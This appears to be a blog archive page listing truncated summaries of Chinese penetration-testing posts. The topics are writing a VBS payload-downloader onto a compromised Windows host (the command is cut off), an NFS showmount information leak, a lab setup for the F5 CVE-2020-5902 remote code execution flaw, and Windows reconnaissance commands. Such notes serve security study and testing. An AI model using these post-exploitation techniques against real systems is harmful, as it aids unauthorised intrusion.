07 2020 档案
摘要:当获取到内网一台windows主机时,其不能上传shell,可以执行命令,这时候可以上传或者从我们的服务器上下载payload 1、vbs #首先先向windows写入一个vbs脚本 echo set a=createobject(^"adod^"+^"b.stream^"):set w=creat
阅读全文
摘要:记录一下扫描和测试中遇到的一个漏洞:目标主机showmount -e信息泄露 先了解一下showmount命令: showmount命令用于查询NFS服务器 (NFS 网络文件系统) # showmount --help Usage: showmount [-adehv] [--all] [--di
阅读全文
摘要:这几天通报了f5的一个漏洞,想着先弄个环境保存着,说不定后面就用到了。。 1、漏洞描述 近日,F5官方发布公告,修复了流量管理用户界面(TMUI)中存在的一个远程代码执行漏洞(CVE-2020-5902)。此漏洞允许未经身份验证的攻击者或经过身份验证的用户通过BIG-IP管理端口和/或自身IP对
阅读全文
摘要:基础命令: 查看系统信息:systeminfo 环境变量:set 查看用户信息:net user 查看本地用户组:net localgroup 获得当前用户名:whoami 获得当前用户权限:whoami /priv 网络:ipconfig 显示dns缓存:ipconfig /displaydns
阅读全文
